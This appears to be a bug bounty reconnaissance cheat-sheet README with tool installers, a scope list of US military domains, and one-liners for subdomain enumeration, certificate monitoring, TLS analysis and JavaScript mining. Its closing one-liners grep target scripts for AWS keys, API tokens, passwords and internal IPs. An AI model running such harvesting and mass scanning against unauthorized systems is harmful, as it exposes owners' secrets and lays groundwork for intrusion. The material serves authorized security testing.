The Ultimate Bug Bounty Reconnaissance Arsenal
"In the shadows we hunt, in the code we trust"
Full DoD Scope - 20 Domains
```bash
# BBRF Scope - All DoD Domains
bbrf inscope add '*.af.mil' '*.army.mil' '*.marines.mil' '*.navy.mil' \
  '*.spaceforce.mil' '*.ussf.mil' '*.pentagon.mil' '*.osd.mil' '*.disa.mil' \
  '*.dtra.mil' '*.dla.mil' '*.dcma.mil' '*.dtic.mil' '*.dau.mil' \
  '*.health.mil' '*.ng.mil' '*.uscg.mil' '*.socom.mil' '*.dds.mil' \
  '*.yellowribbon.mil'
```
| Military Branches | DoD Agencies | Support Commands |
|---|---|---|
| *.af.mil - Air Force | *.pentagon.mil - Pentagon HQ | *.dtic.mil - Tech Info Center |
| *.army.mil - Army | *.osd.mil - Office of SecDef | *.dau.mil - Acquisition Univ |
| *.marines.mil - Marines | *.disa.mil - Defense Info Systems | *.health.mil - Military Health |
| *.navy.mil - Navy | *.dtra.mil - Threat Reduction | *.ng.mil - National Guard |
| *.spaceforce.mil - Space Force | *.dla.mil - Logistics Agency | *.uscg.mil - Coast Guard |
| *.ussf.mil - Space Force | *.dcma.mil - Contract Management | *.socom.mil - Special Operations |
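With a scope this broad, recon pipelines leak out-of-scope hosts easily. Below is a minimal sketch of a scope filter in portable shell; the `SCOPE` list, the `in_scope` function name, and the file names are illustrative placeholders, not part of any official tooling - trim the list to your program's actual scope:

```shell
# in_scope: read hostnames on stdin, keep only those under a scope domain.
# SCOPE holds the registered domains (the '*.'-wildcard prefix is implied),
# so 'af.mil' matches af.mil itself and any subdomain of it.
SCOPE='af.mil army.mil navy.mil'

in_scope() {
  pattern=''
  for base in $SCOPE; do
    esc=$(printf '%s' "$base" | sed 's/\./\\./g')   # escape dots for grep -E
    pattern="${pattern:+$pattern|}(^|\\.)${esc}\$"  # anchor: start-or-dot + domain + end
  done
  grep -E "$pattern"
}
```

Drop it into any pipeline, e.g. `cat mega_subs.txt | in_scope | anew inscope_subs.txt`.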
This repository is for EDUCATIONAL and AUTHORIZED testing ONLY. Always obtain proper authorization before testing.
Click to read our Security Policy & Guidelines
- ✅ Authorized Bug Bounty Programs - HackerOne, Bugcrowd, Intigriti, etc.
- ✅ Authorized Penetration Testing - With written permission
- ✅ Personal Lab Environments - Your own infrastructure
- ✅ Educational Purposes - Learning and research
- ✅ DoD VDP Program - Following program rules
- ❌ Unauthorized Testing - Testing without explicit permission
- ❌ Malicious Intent - Using techniques for harm or theft
- ❌ Out-of-Scope Testing - Testing targets outside program scope
- ❌ Social Engineering - Unless explicitly allowed in the program
- ❌ DoS/DDoS Attacks - Resource exhaustion attacks
- Read the Program Policy - Always review scope and rules
- Test Safely - Don't cause harm to production systems
- Document Everything - Keep detailed notes of your findings
- Report Privately - Use official channels for disclosure
- Give Time to Fix - Allow vendors reasonable time to patch
- Be Professional - Maintain ethical standards
Found a security issue in this repository? Please report it responsibly:
Click to expand navigation
| Section | Description |
|---|---|
| About | Project overview and goals |
| Quick Start | Get started in 5 minutes |
| Required Tools | Essential toolset |
| BBRF Scope DoD | DoD scope configuration |
| Subdomain Enumeration | Finding subdomains |
| JavaScript Recon | JS file analysis |
| XSS Detection | Cross-site scripting |
| SQL Injection | SQLi techniques |
| SSRF & SSTI | Server-side attacks |
| Web Crawling | Deep crawling methods |
| Parameter Discovery | Hidden params |
| Content Discovery | Sensitive files |
| Nuclei Scanning | Automated scanning |
| API Security Testing | API vulnerabilities |
| Cloud Security | AWS, GCP, Azure |
| Automation Scripts | Ready-to-use scripts |
| Bash Functions | Shell productivity |
| New Oneliners 2026 | CVE-2026 exploits & techniques |
| Oneliners 2024-2025 | Previous techniques |
| Search Engines | Hacker search engines |
| Wordlists | Best wordlists |
| Resources | Books, courses, blogs |
🎯 **Mission Statement**

- Share elite bug bounty techniques from world-class hunters
- Build the most comprehensive one-liner collection
- Empower the security research community
Our main goal is to share tips from well-known bug hunters. Using advanced recon methodology, we discover subdomains, APIs, tokens, and vulnerabilities that are exploitable. We aim to influence and educate the community with powerful one-liner techniques for better understanding and faster results.
- **Curated Commands**: battle-tested by real hunters
- **Full Methodology**: recon to exploitation
- **Constantly Updated**: new techniques weekly
- **Community Driven**: top hunters worldwide
Click to see detailed statistics
| Category | Count | Status |
|---|---|---|
| One-Liners | 400+ | ✅ Active |
| Techniques | 50+ | ✅ Active |
| Tools Covered | 100+ | ✅ Active |
| CVE Examples | 20+ | ✅ Active |
| DoD Domains | 20 | ✅ Active |
| Contributors | Growing | 🌱 Growing |
| Last Update | 2026 | ✅ Current |
```bash
# Step 1: Install essential tools (ProjectDiscovery Suite)
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

# Step 2: Run your first reconnaissance chain
subfinder -d target.com -silent | httpx -silent | nuclei -severity critical,high

# Step 3: Analyze results and profit!
# Check the output for vulnerabilities and start reporting!
```
Want a complete automated workflow? Click here!
```bash
# Advanced Quick Start - Complete Recon Pipeline
TARGET="target.com"

# Subdomain enumeration with multiple sources
subfinder -d $TARGET -all -silent | \
  httpx -silent -title -status-code -tech-detect -follow-redirects | \
  tee subdomains_live.txt

# Deep crawling and JavaScript file discovery
cat subdomains_live.txt | katana -silent -d 3 -jc | \
  grep -E '\.js$' | \
  httpx -silent -mc 200 | \
  tee js_files.txt

# Vulnerability scanning with Nuclei
nuclei -l subdomains_live.txt -severity critical,high,medium -silent -o nuclei_results.txt

# Results saved in:
# - subdomains_live.txt (Live domains)
# - js_files.txt (JavaScript files)
# - nuclei_results.txt (Vulnerabilities found)
```
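After a run like this it helps to see at a glance how much each stage produced. A tiny helper in plain shell (the function name and file names are just examples matching the pipeline above):

```shell
# recap: print a one-line entry count for each result file that exists.
recap() {
  for f in "$@"; do
    # wc -l may pad with spaces on some systems; tr strips them
    [ -f "$f" ] && printf '%s: %s entries\n' "$f" "$(wc -l < "$f" | tr -d ' ')"
  done
}
```

Usage: `recap subdomains_live.txt js_files.txt nuclei_results.txt`.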
| Tip | Description |
|---|---|
| Authorization | Always get proper authorization before testing |
| Notes | Keep detailed notes of your findings |
| Workflow | Start with automated tools, then manual testing |
| Impact | Focus on high-impact vulnerabilities first |
| Community | Join the community and learn from others |
Click to expand complete tool list
| Category | Tools | Installation |
|---|---|---|
| Subdomain | Subfinder, Amass, Assetfinder, Findomain, Chaos | go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest |
| HTTP Probing | Httpx, Httprobe | go install github.com/projectdiscovery/httpx/cmd/httpx@latest |
| Crawling | Katana, Gospider, Hakrawler, Cariddi | go install github.com/projectdiscovery/katana/cmd/katana@latest |
| URLs | Gau, Waybackurls, Waymore | go install github.com/lc/gau/v2/cmd/gau@latest |
| Scanning | Nuclei, Jaeles, Naabu | go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest |
| XSS | Dalfox, XSStrike, Kxss, Airixss | go install github.com/hahwul/dalfox/v2@latest |
| SQLi | SQLMap, Ghauri | pip install sqlmap ghauri |
| Utilities | Anew, Qsreplace, Unfurl, Gf, Uro | go install github.com/tomnomnom/anew@latest |
| Fuzzing | Ffuf, Feroxbuster | go install github.com/ffuf/ffuf/v2@latest |
| JS Analysis | Subjs, LinkFinder, SecretFinder, Jsubfinder | go install github.com/lc/subjs@latest |
| Cert Monitoring | Certstream, Certstream-go | pip install certstream |
| DNS | Dnsx, Shuffledns, PureDNS, MassDNS, Dnsgen | go install github.com/projectdiscovery/dnsx/cmd/dnsx@latest |
| Reverse DNS | Hakrevdns, Prips | go install github.com/hakluke/hakrevdns@latest |
| API Discovery | Arjun, x8, ParamSpider | pip install arjun |
| Screenshots | Gowitness, Eyewitness | go install github.com/sensepost/gowitness@latest |
| Cloud | AWS CLI, CloudEnum, S3Scanner | pip install awscli |
| OSINT | Shodan CLI, Censys, Metabigor | pip install shodan censys |
| Git Recon | Trufflehog, Gitrob, Github-Subdomains | go install github.com/trufflesecurity/trufflehog/v3@latest |
| Scope Management | BBRF | pip install bbrf |
```bash
# Ubuntu/Debian
sudo apt update && sudo apt install -y \
  jq curl wget git python3 python3-pip golang-go \
  nmap masscan chromium-browser parallel whois dnsutils \
  libpcap-dev build-essential

# macOS
brew install jq curl wget git python3 go nmap masscan chromium parallel whois bind
```
```bash
# Add to ~/.bashrc or ~/.zshrc
export GOPATH=$HOME/go
export GOROOT=/usr/local/go
export PATH=$PATH:$GOPATH/bin:$GOROOT/bin

# Reload shell
source ~/.bashrc   # or: source ~/.zshrc
```
```bash
#!/bin/bash
# One-click install for all Go tools
echo "[*] Installing Go tools..."

go_tools=(
  # ProjectDiscovery
  "github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest"
  "github.com/projectdiscovery/httpx/cmd/httpx@latest"
  "github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest"
  "github.com/projectdiscovery/katana/cmd/katana@latest"
  "github.com/projectdiscovery/naabu/v2/cmd/naabu@latest"
  "github.com/projectdiscovery/dnsx/cmd/dnsx@latest"
  "github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest"
  "github.com/projectdiscovery/chaos-client/cmd/chaos@latest"
  # Tomnomnom
  "github.com/tomnomnom/waybackurls@latest"
  "github.com/tomnomnom/anew@latest"
  "github.com/tomnomnom/qsreplace@latest"
  "github.com/tomnomnom/unfurl@latest"
  "github.com/tomnomnom/gf@latest"
  "github.com/tomnomnom/assetfinder@latest"
  "github.com/tomnomnom/httprobe@latest"
  # Fuzzing & Crawling
  "github.com/ffuf/ffuf/v2@latest"
  "github.com/jaeles-project/gospider@latest"
  "github.com/hakluke/hakrawler@latest"
  "github.com/hakluke/hakrevdns@latest"
  # Security
  "github.com/hahwul/dalfox/v2@latest"
  "github.com/lc/gau/v2/cmd/gau@latest"
  "github.com/lc/subjs@latest"
  # Screenshots & Utils
  "github.com/sensepost/gowitness@latest"
  "github.com/d3mondev/puredns/v2@latest"
  "github.com/j3ssie/metabigor@latest"
  "github.com/Emoe/kxss@latest"
  "github.com/ferreiraklet/airixss@latest"
  "github.com/edoardottt/cariddi/cmd/cariddi@latest"
  "github.com/trufflesecurity/trufflehog/v3@latest"
)

for tool in "${go_tools[@]}"; do
  echo "[+] Installing $tool"
  go install -v "$tool" 2>/dev/null
done

echo "[✓] Go tools installed!"
```
```bash
#!/bin/bash
# One-click install for all Python tools
echo "[*] Installing Python tools..."

pip3 install --upgrade pip
pip3 install \
  certstream sqlmap ghauri uro arjun paramspider \
  shodan censys bbrf dnsgen waymore xsstrike \
  s3scanner cloud_enum trufflehog

echo "[✓] Python tools installed!"
```
```bash
#!/bin/bash
# Install Feroxbuster (Rust)
echo "[*] Installing Rust tools..."

# Install Rust if not present
if ! command -v cargo &> /dev/null; then
  curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
  source $HOME/.cargo/env
fi

# Install Feroxbuster
cargo install feroxbuster

echo "[✓] Rust tools installed!"
```
```bash
#!/bin/bash
# Install tools that require cloning
echo "[*] Installing external tools..."

TOOLS_DIR="$HOME/tools"
mkdir -p $TOOLS_DIR && cd $TOOLS_DIR

# LinkFinder
git clone https://github.com/GerbenJavado/LinkFinder.git
cd LinkFinder && pip3 install -r requirements.txt && cd ..

# SecretFinder
git clone https://github.com/m4ll0k/SecretFinder.git
cd SecretFinder && pip3 install -r requirements.txt && cd ..

# Findomain
wget https://github.com/Findomain/Findomain/releases/latest/download/findomain-linux.zip
unzip findomain-linux.zip && chmod +x findomain && sudo mv findomain /usr/local/bin/

# MassDNS
git clone https://github.com/blechschmidt/massdns.git
cd massdns && make && sudo mv bin/massdns /usr/local/bin/ && cd ..

# Amass
go install -v github.com/owasp-amass/amass/v4/...@master

# GF Patterns
git clone https://github.com/1ndianl33t/Gf-Patterns.git
mkdir -p ~/.gf && cp Gf-Patterns/*.json ~/.gf/

echo "[✓] External tools installed!"
```
```bash
#!/bin/bash
# MASTER INSTALLER - Run all installation scripts
echo "============================================================"
echo "       KingOfBugBounty - Complete Tool Installation"
echo "============================================================"

# System dependencies (run with sudo)
echo "[1/5] Installing system dependencies..."
sudo apt update && sudo apt install -y jq curl wget git python3 python3-pip \
  golang-go nmap masscan chromium-browser parallel whois dnsutils \
  libpcap-dev build-essential

# Go environment
echo "[2/5] Setting up Go environment..."
echo 'export GOPATH=$HOME/go' >> ~/.bashrc
echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc
source ~/.bashrc

# Go tools
echo "[3/5] Installing Go tools..."
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
go install -v github.com/projectdiscovery/katana/cmd/katana@latest
go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest
go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest
go install -v github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest
go install -v github.com/tomnomnom/waybackurls@latest
go install -v github.com/tomnomnom/anew@latest
go install -v github.com/tomnomnom/qsreplace@latest
go install -v github.com/tomnomnom/unfurl@latest
go install -v github.com/tomnomnom/gf@latest
go install -v github.com/tomnomnom/assetfinder@latest
go install -v github.com/ffuf/ffuf/v2@latest
go install -v github.com/hahwul/dalfox/v2@latest
go install -v github.com/lc/gau/v2/cmd/gau@latest
go install -v github.com/jaeles-project/gospider@latest
go install -v github.com/hakluke/hakrawler@latest
go install -v github.com/hakluke/hakrevdns@latest
go install -v github.com/sensepost/gowitness@latest
go install -v github.com/d3mondev/puredns/v2@latest
go install -v github.com/owasp-amass/amass/v4/...@master

# Python tools
echo "[4/5] Installing Python tools..."
pip3 install certstream sqlmap ghauri uro arjun shodan censys bbrf dnsgen waymore

# Rust tools
echo "[5/5] Installing Rust tools..."
if ! command -v cargo &> /dev/null; then
  curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
  source $HOME/.cargo/env
fi
cargo install feroxbuster

# Update Nuclei templates
nuclei -update-templates

echo ""
echo "============================================================"
echo "               ✓ Installation Complete!"
echo "============================================================"
echo ""
echo "Run 'source ~/.bashrc' to reload your environment"
```
```bash
#!/bin/bash
# Install essential wordlists
WORDLIST_DIR="$HOME/wordlists"
mkdir -p $WORDLIST_DIR && cd $WORDLIST_DIR

# SecLists
git clone https://github.com/danielmiessler/SecLists.git

# Assetnote Wordlists
wget -r --no-parent -R "index.html*" https://wordlists-cdn.assetnote.io/data/ -nH

# OneListForAll
git clone https://github.com/six2dez/OneListForAll.git

# Resolvers
wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers.txt -O resolvers.txt
wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt -O resolvers-trusted.txt

echo "[✓] Wordlists installed in $WORDLIST_DIR"
```
```bash
#!/bin/bash
# Verify all tools are installed
echo "Checking installed tools..."

tools=("subfinder" "httpx" "nuclei" "katana" "naabu" "dnsx" "ffuf" "feroxbuster"
       "dalfox" "gau" "waybackurls" "anew" "qsreplace" "gf" "gospider" "hakrawler"
       "amass" "gowitness" "certstream" "sqlmap" "arjun" "shodan")

for tool in "${tools[@]}"; do
  if command -v $tool &> /dev/null; then
    echo "[✓] $tool"
  else
    echo "[✗] $tool - NOT FOUND"
  fi
done
```
```bash
# Add all DoD domains to BBRF scope
bbrf inscope add '*.af.mil' '*.army.mil' '*.marines.mil' '*.navy.mil' \
  '*.spaceforce.mil' '*.ussf.mil' '*.pentagon.mil' '*.osd.mil' '*.disa.mil' \
  '*.dtra.mil' '*.dla.mil' '*.dcma.mil' '*.dtic.mil' '*.dau.mil' \
  '*.health.mil' '*.ng.mil' '*.uscg.mil' '*.socom.mil' '*.dds.mil' \
  '*.yellowribbon.mil'
```
⚠️ ENUMERATE EVERYTHING ⚠️
```bash
# Ultimate subdomain enumeration - all tools combined
subfinder -d target.com -all -silent | anew subs.txt
amass enum -passive -d target.com | anew subs.txt
assetfinder -subs-only target.com | anew subs.txt
chaos -d target.com -silent | anew subs.txt
findomain -t target.com -q | anew subs.txt
cat subs.txt | httpx -silent -threads 200 | anew alive.txt
```
```bash
# crt.sh extraction
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | httpx -silent
```
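crt.sh results often contain wildcard entries (`*.sub.target.com`), mixed-case names, and hosts that belong to other domains entirely. A small normalization helper in plain shell can clean the jq output before probing; the `clean_crt` name is just a placeholder, and only sed/grep/sort are assumed:

```shell
# clean_crt DOMAIN: read certificate names on stdin, strip leading wildcards,
# lowercase, keep only names under DOMAIN, and de-duplicate.
clean_crt() {
  domain=$1
  esc=$(printf '%s' "$domain" | sed 's/\./\\./g')   # escape dots for grep -E
  sed 's/^\*\.//' | tr 'A-Z' 'a-z' | grep -E "(^|\.)${esc}\$" | sort -u
}
```

Usage sketch: `curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | clean_crt target.com | httpx -silent`.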
```bash
# Monitor certificates in real-time for a specific keyword
pip install certstream && python3 -c "import certstream; certstream.listen_for_events(lambda msg, ctx: print(msg['data']['leaf_cert']['subject']['CN']) if 'target' in str(msg.get('data',{}).get('leaf_cert',{}).get('subject',{}).get('CN','')) else None, url='wss://certstream.calidog.io/')"

# Real-time cert monitoring filtered by domain keywords
certstream --full | jq -r 'select(.data.leaf_cert.subject.CN != null) | .data.leaf_cert.subject.CN' | grep -iE "(target|company|brand)" | anew certstream_targets.txt

# Extract all SANs (Subject Alternative Names) in real-time
certstream --full | jq -r '.data.leaf_cert.extensions.subjectAltName // empty' | tr ',' '\n' | sed 's/DNS://g' | grep -E "target\.com$" | sort -u | anew certstream_subs.txt

# Real-time cert discovery -> immediate alive check
certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' 2>/dev/null | grep -iE "target" | sort -u | while read domain; do echo "$domain" | httpx -silent -timeout 3 | anew live_certs.txt; done

# Monitor for potential phishing domains (brand impersonation)
certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "(paypal|apple|google|microsoft|amazon|facebook|netflix|bank)" | grep -vE "\.(paypal|apple|google|microsoft|amazon|facebook|netflix)\.com$" | anew phishing_certs.txt

# Real-time cert discovery -> automatic vulnerability scan
certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -E "\.target\.com$" | sort -u | while read domain; do echo "https://$domain" | nuclei -t /nuclei-templates/technologies/ -silent; done

# Collect all certificates for specific TLDs for one hour
timeout 3600 bash -c 'certstream --full | jq -r ".data.leaf_cert.all_domains[]? // empty" | grep -E "\.(gov|mil|edu)$" | anew gov_mil_edu_certs.txt' &

# Find wildcard certificates (*.domain.com) in real-time
certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep "^\*\." | sed 's/^\*\.//' | sort -u | anew wildcard_domains.txt

# Real-time certs -> resolve IP -> Shodan lookup
certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "target" | while read domain; do IP=$(dig +short "$domain" | head -1); [ -n "$IP" ] && echo "$domain,$IP,$(shodan host $IP 2>/dev/null | head -3 | tr '\n' ' ')"; done | anew cert_shodan.txt

# Full certificate logging with timestamps for analysis
certstream --full | jq -c '{timestamp: now | strftime("%Y-%m-%d %H:%M:%S"), cn: .data.leaf_cert.subject.CN, domains: .data.leaf_cert.all_domains, issuer: .data.leaf_cert.issuer.O}' | grep -i "target" | tee -a certstream_log.json

# Monitor multiple bug bounty targets simultaneously
TARGETS="hackerone|bugcrowd|intigriti|yeswehack"; certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -iE "$TARGETS" | anew bb_new_assets.txt &
```
```bash
# Shodan recon -> Nuclei scan
shodan domain target.com | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high

# Find all IPs from an organization's ASN
echo 'target_org' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew'
```
shuffledns -d target.com -w wordlist.txt -r resolvers.txt -silent | httpx -silent | anew
subfinder -d target.com -recursive -all -silent | dnsx -silent | httpx -silent | anew recursive_subs.txt
```bash
# HackerTarget
curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1 | anew subs.txt

# RapidDNS
curl -s "https://rapiddns.io/subdomain/target.com?full=1" | grep -oP '(?<=target="_blank">)[^<]+' | grep "target.com" | anew subs.txt

# Riddler.io
curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -oP '\b([a-zA-Z0-9]([a-zA-Z0-9-]*[a-zA-Z0-9])?\.)+target\.com\b' | anew subs.txt

# AlienVault OTX
curl -s "https://otx.alienvault.com/api/v1/indicators/domain/target.com/passive_dns" | jq -r '.passive_dns[].hostname' 2>/dev/null | sort -u | anew subs.txt

# URLScan.io
curl -s "https://urlscan.io/api/v1/search/?q=domain:target.com" | jq -r '.results[].page.domain' 2>/dev/null | sort -u | anew subs.txt
```
github-subdomains -d target.com -t YOUR_GITHUB_TOKEN -o github_subs.txt
```bash
# Using Censys API
censys search "target.com" --index-type hosts | jq -r '.[] | .name' | sort -u | anew censys_subs.txt

# SecurityTrails subdomain enumeration
curl -s "https://api.securitytrails.com/v1/domain/target.com/subdomains" -H "APIKEY: YOUR_API_KEY" | jq -r '.subdomains[]' | sed 's/$/.target.com/' | anew subs.txt
```
```bash
# Extract subdomains from the Wayback Machine
curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew wayback_subs.txt

# CommonCrawl subdomain extraction
curl -s "https://index.commoncrawl.org/CC-MAIN-2023-50-index?url=*.target.com&output=json" | jq -r '.url' | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew commoncrawl_subs.txt

# VirusTotal API
curl -s "https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=target.com" | jq -r '.subdomains[]' 2>/dev/null | anew vt_subs.txt
```
```bash
# Check for zone transfer vulnerability
dig axfr @ns1.target.com target.com | grep -E "^[a-zA-Z0-9]" | awk '{print $1}' | sed 's/\.$//' | anew zone_transfer.txt

# Find domains on the same IP
host target.com | awk '/has address/ {print $4}' | xargs -I@ sh -c 'curl -s "https://api.hackertarget.com/reverseiplookup/?q=@"' | anew reverse_ip.txt

# Get ASN and scan all IP ranges
whois -h whois.radb.net -- '-i origin AS12345' | grep -Eo "([0-9.]+){4}/[0-9]+" | xargs -I@ sh -c 'nmap -sL @ | grep "report for" | cut -d" " -f5' | httpx -silent | anew bgp_hosts.txt

# Mass PTR lookup
prips 192.168.1.0/24 | xargs -P50 -I@ sh -c 'host @ 2>/dev/null | grep "pointer" | cut -d" " -f5' | sed 's/\.$//' | anew ptr_subs.txt
```
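If `prips` isn't installed, a /24 block can be expanded in plain shell. A dependency-free stand-in, with the assumption (kept for simplicity) that only /24 masks are handled; the `prips24` name is made up for this sketch:

```shell
# prips24 CIDR: expand a /24 network (e.g. 192.168.1.0/24) into its 254 host IPs.
prips24() {
  net=${1%/24}          # '192.168.1.0/24' -> '192.168.1.0'
  prefix=${net%.*}      # '192.168.1.0'    -> '192.168.1'
  i=1
  while [ "$i" -le 254 ]; do
    echo "$prefix.$i"
    i=$((i + 1))
  done
}
```

It slots into the PTR one-liner above in place of `prips`: `prips24 192.168.1.0/24 | xargs -P50 -I@ sh -c '...'`.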
```bash
# THE ULTIMATE SUBDOMAIN HUNTER
(subfinder -d target.com -all -silent; \
 amass enum -passive -d target.com; \
 assetfinder -subs-only target.com; \
 findomain -t target.com -q; \
 chaos -d target.com -silent; \
 curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g'; \
 curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1; \
 curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g') \
 | sort -u | httpx -silent -threads 100 | anew mega_subs.txt

# Generate permutations and resolve
cat subs.txt | dnsgen - | shuffledns -d target.com -r resolvers.txt -silent | anew permutation_subs.txt
```
```bash
# Fast bruteforce with PureDNS
puredns bruteforce wordlist.txt target.com -r resolvers.txt -w puredns_subs.txt

# Extract subdomains from SSL certificates
echo target.com | httpx -silent | xargs -I@ sh -c 'echo | openssl s_client -connect @:443 2>/dev/null | openssl x509 -noout -text | grep -oP "DNS:[^\s,]+" | sed "s/DNS://"' | sort -u | anew ssl_subs.txt
```
```bash
# Find related hosts via favicon hash
# Note: Shodan's http.favicon.hash is the mmh3 hash of the base64-encoded favicon, not md5
python3 -c "import mmh3,requests,codecs;print(mmh3.hash(codecs.encode(requests.get('https://target.com/favicon.ico').content,'base64')))" | xargs -I@ shodan search "http.favicon.hash:@" --fields ip_str,hostnames | anew favicon_hosts.txt
```
```bash
# Use Google dorks (manual or with tools)
# site:*.target.com -www
# inurl:target.com
```
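The dorks above can be generated per target so they are ready to paste into a search bar. A tiny helper; the `dorks` name is a placeholder, and the extra two queries are just common dork patterns added for illustration, not part of any program's methodology:

```shell
# dorks DOMAIN: print a few Google dork queries for the given domain.
dorks() {
  d=$1
  printf 'site:*.%s -www\n' "$d"
  printf 'site:%s ext:php | ext:asp | ext:jsp\n' "$d"
  printf 'site:%s inurl:admin | inurl:login\n' "$d"
}
```

Usage: `dorks target.com`.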
TLS/SSL Certificate Intelligence with TLSX
```bash
# Full TLS certificate details extraction
echo target.com | tlsx -san -cn -so -sv -ss -serial -hash md5 -jarm -ja3 -wc -tps -ve -ce -ct -cdn -silent | tee tlsx_full.txt

# Extract all subdomains from certificate SANs
subfinder -d target.com -silent | tlsx -san -cn -silent -resp-only | grep -oE "[a-zA-Z0-9.-]+\.target\.com" | sort -u | anew san_subdomains.txt

# Find hosts with expired SSL certificates
cat hosts.txt | tlsx -expired -silent -cn -so | tee expired_certs.txt

# Identify self-signed certificates (potential security issue)
cat hosts.txt | tlsx -self-signed -silent -cn -so -hash sha256 | tee self_signed.txt

# Find hosts with deprecated TLS versions (TLS 1.0/1.1)
cat hosts.txt | tlsx -tls-version -silent | grep -E "(tls10|tls11)" | tee weak_tls_versions.txt

# JARM fingerprint for server identification and correlation
subfinder -d target.com -silent | httpx -silent | tlsx -jarm -silent -json | jq -r '[.host, .jarm_hash] | @tsv' | sort -k2 | anew jarm_fingerprints.txt

# Analyze certificate chain and identify the CA
cat hosts.txt | tlsx -so -serial -hash sha256 -ve -ce -json -silent | jq -r '[.host, .issuer_cn, .not_after, .serial] | @tsv' | anew cert_chain_analysis.txt

# Full cipher suite enumeration + TLS version
subfinder -d target.com -silent | httpx -silent | tlsx -cipher -tls-version -silent -json | jq -r '[.host, .version, .cipher] | @tsv' | anew cipher_enum.txt

# Find certificates where the CN doesn't match the hostname
cat hosts.txt | tlsx -mismatched -cn -san -silent | tee mismatched_certs.txt

# Complete TLS intelligence gathering
subfinder -d target.com -all -silent | httpx -silent -p 443,8443,4443,9443 | tlsx -san -cn -so -sv -ss -serial -expired -self-signed -mismatched -tls-version -jarm -hash sha256 -json -silent | jq -c '{host: .host, cn: .subject_cn, san: .san, issuer: .issuer_cn, expired: .expired, self_signed: .self_signed, tls: .version, jarm: .jarm_hash}' | tee tlsx_full_recon.json
```
subfinder -d target.com -silent | httpx -silent | katana -d 5 -jc -silent | grep -iE '\.js$' | anew js.txt
cat js.txt | httpx -silent -sr -srd js_files/ && nuclei -t exposures/ -target js.txt
cat js.txt | xargs -I@ -P10 bash -c 'python3 linkfinder.py -i @ -o cli 2>/dev/null' | anew endpoints.txt
cat js.txt | xargs -I@ -P5 python3 SecretFinder.py -i @ -o cli | anew secrets.txt
cat file.js | grep -oE "var\s+\w+\s*=\s*['\"][^'\"]+['\"]" | sort -u
cat js.txt | nuclei -t http/exposures/tokens/ -silent | anew api_keys.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "(https?://[^\"\'\`\s\<\>]+)" | sort -u | anew js_urls.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^\"\'\`\s\<\>]+|/v[0-9]+/[^\"\'\`\s\<\>]+)" | sort -u
cat js.txt | xargs -I@ curl -s @ | grep -iE "(password|passwd|pwd|secret|api_key|apikey|token|auth)" | sort -u
cat js.txt | xargs -I@ curl -s @ | grep -oE "(AKIA[0-9A-Z]{16}|ABIA[0-9A-Z]{16}|ACCA[0-9A-Z]{16}|ASIA[0-9A-Z]{16})" | sort -u | anew aws_keys.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "AIza[0-9A-Za-z\-_]{35}" | sort -u | anew google_api_keys.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "https://[a-zA-Z0-9-]+\.firebaseio\.com|https://[a-zA-Z0-9-]+\.firebase\.com" | sort -u | anew firebase_urls.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com|s3://[a-zA-Z0-9.-]+|s3-[a-zA-Z0-9-]+\.amazonaws\.com/[a-zA-Z0-9.-]+" | sort -u | anew s3_from_js.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "(10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.(1[6-9]|2[0-9]|3[0-1])\.[0-9]{1,3}\.[0-9]{1,3}|192\.168\.[0-9]{1,3}\.[0-9]{1,3})" | sort -u | anew internal_ips.txt
